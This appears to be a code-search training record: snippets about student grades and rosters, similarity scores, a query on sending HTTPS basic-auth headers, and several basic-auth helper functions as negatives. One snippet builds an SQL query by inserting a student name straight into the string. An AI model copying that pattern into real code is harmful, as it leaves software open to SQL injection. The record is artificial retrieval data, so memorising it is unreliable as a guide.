subject=instance\n )\n serializer = self.get_serializer(query, many=True)\n \n id = self.request.query_params.get('id')\n\n if id:\n q = get_object_or_404(\n models.StudentSubject,\n pk=id,\n subject=instance\n )\n return self.filtering(request, q)\n return Response(serializer.data)\n except:\n raise except_handler.ActionDecor()", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n project_list = hackbright.get_grades_by_github(github)\n\n\n return render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n project_list=project_list)", "def func_Q1(db):\n grades_collection = db.grades\n student_list = list(grades_collection.distinct(\"student_id\", {}))\n\n return len(student_list)", "def view_student_gradebook():\n\n user_id = session.get('user_id')\n courses = []\n grades = []\n con = db.get_db()\n cur = con.cursor()\n\n cur.execute(\"\"\"SELECT DISTINCT courses.course_id, (ROUND(sum(grades.points_received)/sum(grades.total_points), 2 )*100)\n as total_grade, roster.session_id as class_session,\n courses.name as class_name, users.name AS teacher_name, grades.student_id\n FROM courses JOIN sessions on courses.course_id = sessions.course_id\n\t\t\t\t JOIN users on courses.teacherid= users.id\n JOIN assignments on assignments.session_id = sessions.id\n JOIN grades on grades.assignment_id = assignments.assignment_id\n JOIN roster on roster.session_id = sessions.id\n WHERE grades.student_id = %s\n\t GROUP BY grades.student_id, roster.session_id, courses.course_id, users.id\"\"\",\n (user_id,))\n courses = cur.fetchall()\n\n cur.close()\n con.close()\n\n return render_template(\"/layouts/gradebook/student_view.html\", courses=courses)", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n title_grade_list = hackbright.get_grades_by_github(github)\n\n html = render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n title_grade_list=title_grade_list)\n\n return html", "def student_grade(github, project_title):\n\n QUERY= \"\"\"SELECT grade\n FROM Grades \n WHERE student_github = ? AND project_title = ?\"\"\"\n \n\n db_cursor.execute(QUERY, (github, project_title))\n\n grade_value = db_cursor.fetchone()\n\n print \"%s's grade for %s: %s\" % (github, project_title, grade_value)", "def get_grades(session): \n res = _get_grades_step_0(session)\n dossier_path = re.search('href=\"([\\/a-zA-Z0-9\\.]*)\" title=\"Mon dossier\"', res).group(1)\n\n print(\"[STEP 0] got dossier path: \" + dossier_path)\n\n res = _get_grades_step_1(session, dossier_path)\n\n # Get the list of years available (1A, 2A, 3A) and their identifiers\n res = _get_grades_step_2(session)\n rgx = re.finditer(r'''<u>([A-Z\\/0-9]*)<\\/u><\\/a><\\/td><td width=\"30%\"><a href=\"#\" onclick=\"return oamSubmitForm\\('([a-zA-Z0-9_]*)','([a-zA-Z0-9_:]*)',null,\\[\\['row','([0-9]*)'\\]\\]\\);\" id=\"([a-zA-Z0-9_:]*)\">([a-zA-Z0-9 ]*)<\\/a>''', res)\n\n years = []\n for match in rgx:\n years.append({\n \"id\": match.group(1),\n \"name\": match.group(6),\n \"param\": match.group(2),\n \"paramval\": match.group(5),\n \"row\": match.group(4)\n })\n\n print(\"[STEP 2] got years:\", years)\n\n year_grades = []\n for year in years:\n res = _get_grades_step_3(session, year)\n\n soup = BeautifulSoup(res, 'html.parser')\n table = soup.find('table', attrs={'class':'portlet-table'})\n table_body = table.find('tbody')\n rows = table_body.find_all('tr')\n\n rawgrades = []\n for row in rows:\n cols = row.find_all('td')\n cols = [ele.text.strip() for ele in cols]\n\n data = []\n for ele in cols:\n if ele:\n data.append(ele)\n\n rawgrades.append(data)\n\n grades = []\n gradergx = re.compile('^[0-9]{1,2}$')\n for line in rawgrades:\n if len(line) == 3 and gradergx.match(line[2]):\n grades.append({\n \"module_code\": line[0],\n \"module_name\": line[1],\n \"module_grade\": int(line[2])\n })\n\n print(\"[STEP 3] got {nb} modules with grades for year {year}\".format(\n nb=len(grades), year=year['name']))\n\n year_grades.append({\n 'year':{'id': year['id'], 'label': year['name']},\n 'grades': grades,\n 'raw': rawgrades\n })\n\n return year_grades", "def get_results(self, stud_name):\n self.cur = self.conn.cursor(pymysql.cursors.DictCursor)\n self.cur.execute(\n \"SELECT c.naam, e.cijfer, e.ex_datum \"\n \"FROM studenten s \"\n \"INNER JOIN examens e ON e.stud_id = s.stud_id \"\n \"INNER JOIN cursussen c ON c.cur_id = e.cur_id WHERE s.naam = '{0}' \"\n \"ORDER BY e.ex_datum DESC\".format(stud_name))\n self.cur.close()\n\n return self.cur.fetchall()", "def grade_report(course):\n report = []\n for st in course.get_students():\n try:\n average = sum(course.get_grades(st)) / len(course.get_grades(st))\n report.append(str(st) + '\\'s mean grade is: ' + str(average) + '.')\n except ZeroDivisionError:\n report.append(str(st) + ' has no grades.')\n return '\\n'.join(report)", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n grades = hackbright.get_grades_by_github(github)\n\n html = render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n grades=grades)\n\n return html", "def canvas_api_section_students(state, course_id, section_id):\n\n api = state.canvas_api()\n for student in api.list_section_students(course_id, section_id):\n click.echo(str(student))", "def all_instructors(self):\n \n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Instructor(row [1], row[2], row[3], row[5])\n\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select i.Id,\n i.first_name,\n i.Last_name,\n i.slack_handle,\n i.cohort_id,\n c.name\n from instructors i\n join cohorts c on i.cohort_id = c.id\n order by i.cohort_id\n \"\"\")\n\n all_students = db_cursor.fetchall()\n print('\\n***All Instructors***')\n\n for student in all_students:\n print(student)", "def _create_students_with_state(self, num_students, state=None, grade=0, max_grade=1):\r\n self.define_option_problem(PROBLEM_URL_NAME)\r\n students = [\r\n UserFactory.create(username='robot%d' % i, email='robot+test+%d@edx.org' % i)\r\n for i in xrange(num_students)\r\n ]\r\n for student in students:\r\n CourseEnrollmentFactory.create(course_id=self.course.id, user=student)\r\n StudentModuleFactory.create(course_id=self.course.id,\r\n module_state_key=self.location,\r\n student=student,\r\n grade=grade,\r\n max_grade=max_grade,\r\n state=state)\r\n return students", "def all_instructors(self):\n \n with sqlite3.connect(self.db_path) as conn:\n # conn.row_factory = self.create_student\n conn.row_factory = lambda cursor, row: Instructor(\n row[1], row[2], row[6], row[6], row[5]\n )\n \n \n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select i.Id,\n i.FirstName,\n i.LastName,\n i.SlackHandle,\n i.CohortId,\n i.Specialty,\n c.Name\n from Instructor i\n join Cohort c on i.CohortId = c.Id\n order by i.CohortId\n \"\"\")\n\n all_instructors = db_cursor.fetchall()\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n for instructor in all_instructors:\n print(instructor)", "async def get_exams(\n self, last_sync: datetime = None, deleted=False, **kwargs\n ) -> Union[AsyncIterator[Grade], List[int]]:\n return Exam.get(self._api, last_sync, deleted, **kwargs)", "def search(page, query, paginator=None, students=None, offset=None):\n form = SearchForm()\n if form.validate_on_submit():\n student = db.get_table('student')\n total = student.count(form.name.data)\n page = 1\n paginator = Paginator(page, PER_PAGE, total)\n students = student.search(form.name.data, offset, PER_PAGE)\n query = form.name.data\n elif query is not None:\n student = db.get_table('student')\n total = student.count(query)\n paginator = Paginator(page, PER_PAGE, total)\n if page != 1:\n offset = PER_PAGE * paginator.previous\n students = student.search(query, offset, PER_PAGE)\n return render_template(\n 'search.html', students=students,\n form=form, paginator=paginator, query=query\n )", "def Students_in_class(l:list,d:str,c:str)->list:\n result=[]\n for s in l:\n if Student_is_enrolled(s,d,c):\n result.append(s)\n return result", "def gradeReport(course):\n report = []\n for student in course.allStudents():\n total = 0.0\n numberOfGrades = 0\n for grade in course.getGrades(student):\n total += grade\n numberOfGrades += 1\n \n try:\n average = total / numberOfGrades\n report.append(str(student) + \"'s mean grade is \" + str(average))\n except ZeroDivisionError:\n report.append(str(student) + \" has no grades\")\n \n return '\\n'.join(report)", "def select_all_students(conn):\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM students\")\n\n rows = cur.fetchall()\n print(rows)\n for row in rows:\n print(row)", "def grades(self) -> List[int]:\n\n return grades_present(self, _eps)", "def searchByYear(database):\n year=int(input(\"What is his year of study :\"))\n usrs,find=getByYear(database,year)\n for usr in usrs:\n print(usr)", "def get_all_student_courses(cls, user):\n member_record = CourseMember.objects.filter(user=user)\n member_teacher = member_record.filter(type = 3)\n student_list = []\n\n for member in member_teacher:\n if member.course.pk not in student_list:\n student_list.append(member.course.pk)\n\n return student_list", "def get_student(self):\n return db.get(self.student_key)", "def _getStudentEntries(self, program_entity, student_entity,\n params, id, user, prefix):\n\n items = []\n\n timeline_entity = program_entity.timeline\n\n if timeline_helper.isAfterEvent(timeline_entity,\n 'student_signup_start'):\n # add a link to show all projects\n items += [(ghop_redirects.getListStudentTasksRedirect(\n program_entity, {'url_name':'ghop/student'}),\n \"List my Tasks\", 'any_access')]\n\n items += super(View, self)._getStudentEntries(program_entity,\n student_entity, params, id, user, prefix)\n\n return items", "def get_class_grades(class_id):\n\n grades = []\n quiz_grades = query_db(\n \"SELECT people.name, quizzes.name, grade FROM quiz_grades JOIN people \"\n \"ON quiz_grades.student_id=people.id JOIN quizzes \"\n \"ON quiz_grades.quiz_id=quizzes.id JOIN topics \"\n \"ON quizzes.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id WHERE classes.id=?;\",\n [class_id],\n )\n for grade in quiz_grades:\n grade_class = {}\n grade_class[\"student_name\"] = grade[0]\n grade_class[\"thing_name\"] = str(grade[1]) + \" (Quiz)\"\n grade_class[\"grade\"] = grade[2]\n grades.append(grade_class)\n assignment_grades = query_db(\n \"SELECT people.name, assignments.name, grade FROM assignment_grades \"\n \"JOIN people ON assignment_grades.student_id=people.id \"\n \"JOIN assignments ON assignment_grades.assignment_id=assignments.id \"\n \"JOIN topics ON assignments.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id WHERE classes.id=?;\",\n [class_id],\n )\n for grade in assignment_grades:\n grade_assign = {}\n grade_assign[\"student_name\"] = grade[0]\n grade_assign[\"thing_name\"] = str(grade[1]) + \" (Assignment)\"\n grade_assign[\"grade\"] = grade[2]\n grades.append(grade_assign)\n return grades", "def get_student_classes():\n class_data = query_db(\n \"SELECT classes.id, classes.name FROM classes JOIN roster \"\n \"ON roster.class_id = classes.id where people_id=?;\",\n [flask.session[\"id\"]],\n )\n classes = []\n for class_info in class_data:\n student_class = {}\n student_class[\"id\"] = class_info[0]\n student_class[\"name\"] = class_info[1]\n classes.append(student_class)\n return classes", "def score_list_student(request):\n\n takes = Take.objects.filter(student__username=request.data[\"sid\"])\n serializer = TakeSerializer(takes, many=True)\n return Response(serializer.data)", "def assignment_get_grades(assignment, section_id=None, problem=None):\n\tif problem:\n\t\treturn assignment_get_problem_grades(problem, section_id)\n\n\tif section_id:\n\t\tsection_users = db((db.sections.id==db.section_users.section) & (db.auth_user.id==db.section_users.auth_user))\n\t\tusers = section_users(db.auth_user.course_id == assignment.course)\n\t\tusers = users(db.sections.id == section_id)\n\telse:\n\t\tusers = db(db.auth_user.course_id == assignment.course)\n\tusers = users.select(\n\t\tdb.auth_user.ALL,\n\t\torderby = db.auth_user.last_name,\n\t\t)\n\tgrades = db(db.grades.assignment == assignment.id)\n\tgrades = grades.select(db.grades.ALL)\n\tfor u in users:\n\t\tu.grade = None\n\t\tu.comment = \"\"\n\t\tfor g in grades:\n\t\t\tif g.auth_user.id == u.id:\n\t\t\t\tu.grade = g.score\n\treturn users", "def _grade(student, request, course, keep_raw_scores):\r\n grading_context = course.grading_context\r\n raw_scores = []\r\n\r\n # Dict of item_ids -> (earned, possible) point tuples. This *only* grabs\r\n # scores that were registered with the submissions API, which for the moment\r\n # means only openassessment (edx-ora2)\r\n submissions_scores = sub_api.get_scores(\r\n course.id.to_deprecated_string(), anonymous_id_for_user(student, course.id)\r\n )\r\n\r\n totaled_scores = {}\r\n # This next complicated loop is just to collect the totaled_scores, which is\r\n # passed to the grader\r\n for section_format, sections in grading_context['graded_sections'].iteritems():\r\n format_scores = []\r\n for section in sections:\r\n section_descriptor = section['section_descriptor']\r\n section_name = section_descriptor.display_name_with_default\r\n\r\n # some problems have state that is updated independently of interaction\r\n # with the LMS, so they need to always be scored. (E.g. foldit.,\r\n # combinedopenended)\r\n should_grade_section = any(\r\n descriptor.always_recalculate_grades for descriptor in section['xmoduledescriptors']\r\n )\r\n\r\n # If there are no problems that always have to be regraded, check to\r\n # see if any of our locations are in the scores from the submissions\r\n # API. If scores exist, we have to calculate grades for this section.\r\n if not should_grade_section:\r\n should_grade_section = any(\r\n descriptor.location.to_deprecated_string() in submissions_scores\r\n for descriptor in section['xmoduledescriptors']\r\n )\r\n\r\n if not should_grade_section:\r\n with manual_transaction():\r\n should_grade_section = StudentModule.objects.filter(\r\n student=student,\r\n module_state_key__in=[\r\n descriptor.location for descriptor in section['xmoduledescriptors']\r\n ]\r\n ).exists()\r\n\r\n # If we haven't seen a single problem in the section, we don't have\r\n # to grade it at all! We can assume 0%\r\n if should_grade_section:\r\n scores = []\r\n\r\n def create_module(descriptor):\r\n '''creates an XModule instance given a descriptor'''\r\n # TODO: We need the request to pass into here. If we could forego that, our arguments\r\n # would be simpler\r\n with manual_transaction():\r\n field_data_cache = FieldDataCache([descriptor], course.id, student)\r\n return get_module_for_descriptor(student, request, descriptor, field_data_cache, course.id)\r\n\r\n for module_descriptor in yield_dynamic_descriptor_descendents(section_descriptor, create_module):\r\n\r\n (correct, total) = get_score(\r\n course.id, student, module_descriptor, create_module, scores_cache=submissions_scores\r\n )\r\n if correct is None and total is None:\r\n continue\r\n\r\n if settings.GENERATE_PROFILE_SCORES: \t# for debugging!\r\n if total > 1:\r\n correct = random.randrange(max(total - 2, 1), total + 1)\r\n else:\r\n correct = total\r\n\r\n graded = module_descriptor.graded\r\n if not total > 0:\r\n #We simply cannot grade a problem that is 12/0, because we might need it as a percentage\r\n graded = False\r\n\r\n scores.append(Score(correct, total, graded, module_descriptor.display_name_with_default))\r\n\r\n _, graded_total = graders.aggregate_scores(scores, section_name)\r\n if keep_raw_scores:\r\n raw_scores += scores\r\n else:\r\n graded_total = Score(0.0, 1.0, True, section_name)\r\n\r\n #Add the graded total to totaled_scores\r\n if graded_total.possible > 0:\r\n format_scores.append(graded_total)\r\n else:\r\n log.exception(\"Unable to grade a section with a total possible score of zero. \" +\r\n str(section_descriptor.location))\r\n\r\n totaled_scores[section_format] = format_scores\r\n\r\n grade_summary = course.grader.grade(totaled_scores, generate_random_scores=settings.GENERATE_PROFILE_SCORES)\r\n\r\n # We round the grade here, to make sure that the grade is an whole percentage and\r\n # doesn't get displayed differently than it gets grades\r\n grade_summary['percent'] = round(grade_summary['percent'] * 100 + 0.05) / 100\r\n\r\n letter_grade = grade_for_percentage(course.grade_cutoffs, grade_summary['percent'])\r\n grade_summary['grade'] = letter_grade\r\n grade_summary['totaled_scores'] = totaled_scores \t# make this available, eg for instructor download & debugging\r\n if keep_raw_scores:\r\n grade_summary['raw_scores'] = raw_scores # way to get all RAW scores out to instructor\r\n # so grader can be double-checked\r\n return grade_summary", "def get_students_problem_grades(request, csv=False):\r\n module_state_key = Location.from_deprecated_string(request.GET.get('module_id'))\r\n csv = request.GET.get('csv')\r\n\r\n # Query for \"problem grades\" students\r\n students = models.StudentModule.objects.select_related('student').filter(\r\n module_state_key=module_state_key,\r\n module_type__exact='problem',\r\n grade__isnull=False,\r\n ).values('student__username', 'student__profile__name', 'grade', 'max_grade').order_by('student__profile__name')\r\n\r\n results = []\r\n if not csv:\r\n # Restrict screen list length\r\n # Adding 1 so can tell if list is larger than MAX_SCREEN_LIST_LENGTH\r\n # without doing another select.\r\n for student in students[0:MAX_SCREEN_LIST_LENGTH + 1]:\r\n student_dict = {\r\n 'name': student['student__profile__name'],\r\n 'username': student['student__username'],\r\n 'grade': student['grade'],\r\n }\r\n\r\n student_dict['percent'] = 0\r\n if student['max_grade'] > 0:\r\n student_dict['percent'] = round(student['grade'] * 100 / student['max_grade'])\r\n results.append(student_dict)\r\n\r\n max_exceeded = False\r\n if len(results) > MAX_SCREEN_LIST_LENGTH:\r\n # Remove the last item so list length is exactly MAX_SCREEN_LIST_LENGTH\r\n del results[-1]\r\n max_exceeded = True\r\n\r\n response_payload = {\r\n 'results': results,\r\n 'max_exceeded': max_exceeded,\r\n }\r\n return JsonResponse(response_payload)\r\n else:\r\n tooltip = request.GET.get('tooltip')\r\n filename = sanitize_filename(tooltip[:tooltip.rfind(' - ')])\r\n\r\n header = [_(\"Name\").encode('utf-8'), _(\"Username\").encode('utf-8'), _(\"Grade\").encode('utf-8'), _(\"Percent\").encode('utf-8')]\r\n for student in students:\r\n\r\n percent = 0\r\n if student['max_grade'] > 0:\r\n percent = round(student['grade'] * 100 / student['max_grade'])\r\n results.append([student['student__profile__name'], student['student__username'], student['grade'], percent])\r\n\r\n response = create_csv_response(filename, header, results)\r\n return response", "def add_students() -> None:\r\n faculties = [\"Computer Science\", \"Performing Arts\", \"Engineering\", \"Economics\"]\r\n for faculty in faculties:\r\n for _ in range(50):\r\n create_student(faculty)", "def grade(student, request, course, keep_raw_scores=False):\r\n with manual_transaction():\r\n return _grade(student, request, course, keep_raw_scores)", "def get_enrollments(search: dict) -> list:\n query = session.query(Enrollment)\n for attr, value in search.items():\n query = query.filter(getattr(Enrollment, attr) == value)\n\n return list(map(lambda o: o.asdict(), query.all()))", "def create_students():\n\n\t# create empty list\n\tstudent_list = []\n\n\t# import student classces\n\tstudent_list = create_student_class()\n\n\treturn student_list", "def find_student(self):\n opt = self.input_options(['id', 'name'], 1, 'How do you want to find the student?')\n if opt.upper() == 'ID':\n id = self.input_id(1, \"Input ID of Student You're Looking for\")\n return self.student_list[self.student_list.id == id]\n else:\n name = self.input_name(1, \"Input Name of Student You're Looking for\")\n return self.student_list[self.student_list.name == name]", "def list(self, request):\n queryset = Students.objects.filter(average_rating=5.0)\n students = normalize_students(queryset)\n return Response(students)", "def students_data():\n\n return [\n {'name': 'Alexey', 'rate': 2, 'course': 'Python'},\n {'name': 'Vali', 'rate': 5, 'course': 'Java'},\n {'name': 'Olga', 'rate': 4, 'course': 'Python'},\n {'name': 'Frank', 'rate': 5, 'course': 'Python'},\n {'name': 'Masha', 'rate': 3, 'course': 'Java'},\n {'name': 'Vasily', 'rate': 2, 'course': 'Java'},\n {'name': 'Daria', 'rate': 3, 'course': 'Python'},\n {'name': 'Nickname', 'rate': 4, 'course': 'Python'},\n {'name': 'Fort', 'rate': 3, 'course': 'Java'},\n {'name': 'Lama', 'rate': 4, 'course': 'Java'},\n {'name': 'Pop', 'rate': 2, 'course': 'Python'},\n {'name': 'Sort', 'rate': 3, 'course': 'Python'},\n {'name': 'Elya', 'rate': 5, 'course': 'Java'},\n {'name': 'Tolik', 'rate': 4, 'course': 'Python'},\n ]", "def __statistics_best_situation(self):\n students_list = self.__grade_controller.get_list_of_students_with_best_situation()\n if len(students_list) == 0:\n print(\"There is no student with a grade!\")\n return\n\n for student in students_list:\n print(str(student) + \"\\n\")" ]
[ "0.772303", "0.6642984", "0.6595034", "0.6356183", "0.6333465", "0.62915266", "0.6277043", "0.62721986", "0.6257745", "0.6209728", "0.62009317", "0.61742765", "0.6173197", "0.61293", "0.6112251", "0.6028895", "0.60229445", "0.5965616", "0.5958776", "0.5954945", "0.58713627", "0.58664083", "0.58186996", "0.58093935", "0.5804742", "0.5800359", "0.57900953", "0.5776054", "0.5774096", "0.57500577", "0.5746148", "0.57353926", "0.57258326", "0.5694339", "0.56892776", "0.5629637", "0.56162107", "0.56045175", "0.55817944", "0.55792797", "0.55306065", "0.5501799", "0.54942715", "0.54820216", "0.54514486", "0.5424794", "0.5424623", "0.5388939", "0.5377183", "0.53716606", "0.5360393", "0.5353907", "0.53489065", "0.5339543", "0.53338534", "0.5320768", "0.5303557", "0.5297388", "0.5293609", "0.52772844", "0.52688193", "0.5264621", "0.52633417", "0.52473605", "0.5232123", "0.5226952", "0.5209384", "0.51989657", "0.51898706", "0.51664203", "0.51601535", "0.5157177", "0.515066", "0.51416713", "0.5135563", "0.51124305", "0.5101858", "0.5084936", "0.5079615", "0.50687057", "0.5044918", "0.50432754", "0.5026796", "0.5026379", "0.5020609", "0.5006079", "0.49976906", "0.49975038", "0.49962196", "0.49921033", "0.49888647", "0.49882382", "0.49825698", "0.4972432", "0.4969226", "0.49685147", "0.49652955", "0.49556622", "0.49556142", "0.49400285" ]
0.64473695
3
If username and password are not provided, https request will not send authentication headers
def __init__(self, server, ssl=True, username=None, password=None): self.server = server authstring = 'Basic ' + string.strip(base64.encodestring(username + ':' + password)) self.auth = authstring if username and password else None self.connection_method = httplib.HTTPSConnection if ssl else httplib.HTTPConnection
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def basic_authentication(self, username: str, password: str) -> None:\n self.api_session.auth = (username, password)", "def authenticate():\n return Response(\n 'Could not verify your credentials for that url', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n '', 401, {'WWW-Authenticate': 'Basic realm=\"Login Required\"'}\n )", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials.', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\r\n return Response(\r\n 'Could not verify your access level for that URL.\\n'\r\n 'You have to login with proper credentials', 401,\r\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def set_basic_auth(self, host, username, password):\n raise NotImplementedError(\n u\"%s: Method not implemented\", self.__class__.__name__)", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate(self, username, password):\n return None", "def authenticate():\n\treturn Response(\n\t'Could not verify your access level for that URL.\\n'\n\t'You have to login with proper credentials', 401,\n\t{'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response('Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'}\n )", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'}\n )", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials',\n 401,\n {\n 'WWW-Authenticate': 'Basic realm=\"Login Required\"'\n }\n )", "def login(self, username, password=None):\n password = USERNAME_PASSWORD_MAP.get(username, username)\n self.addHeader(\n 'Authorization', 'Basic {username}:{password}'.format(\n username=username, password=password))\n return self", "def authenticate():\n return send_msg(\n 401,\n 'Must be connected',\n headers={'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def auth_http_request(method, uri, **kwargs):\n\n kwargs[\"headers\"] = _get_datacom_headers(method, kwargs.get(\"headers\"))\n\n logger.debug(\"auth request headers: %s\" % kwargs[\"headers\"])\n\n resp = make_http_request(method, uri, **kwargs)\n\n if not resp.ok:\n raise BadAuthentication(resp.status_code, resp.url, body=resp.content)\n\n return resp", "def authenticate(self):\n r = requests.head(self.url + '/v2/', verify=self.verify_ssl)\n self._authenticate_for(r)", "def authenticate(credentials):", "def authenticate():\n return Response('Not Authorized', 401, {'WWW-Authenticate': 'Basic realm=\"api\"'})", "def auth_handler(self, url, method, timeout, headers, data):\n username = self.username\n password = self.password\n return basic_auth_handler(url, method, timeout, headers, data, username,\n password)", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with Web Manager credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def credentials(self) -> HTTPBasicAuth:\n if self.user is None or self.password is None:\n return None\n else:\n return HTTPBasicAuth(self.user, self.password)", "def authenticate():\n\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n get_auth_headers())", "def get_auth(self, username, password):\n raise NotImplementedError()", "def add_basic_auth(self, credentials: t.Tuple[str, str]) -> 'Request':\n username, password = credentials\n encoded = b64encode(f'{username}:{password}'.encode('ascii'))\n return self.add_headers({\n 'Authorization': f'Basic {encoded.decode(\"ascii\")}'})", "def demo_auth(self, auth=None, url=None):\n assert all([\n auth or url, # Must provide at least one\n not (auth and url) # Cannot provide more than one\n ])\n if url is None:\n url = \"https://piazza.com/demo_login\"\n params = dict(nid=self._nid, auth=auth)\n res = requests.get(url, params=params)\n else:\n res = requests.get(url)\n self.cookies = res.cookies", "def _login(self, environ, start_response):\n response = HTTPUnauthorized()\n response.www_authenticate = ('Basic', {'realm': self._realm})\n return response(environ, start_response)", "def authenticate():\n return flask.Response('Login required.', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", 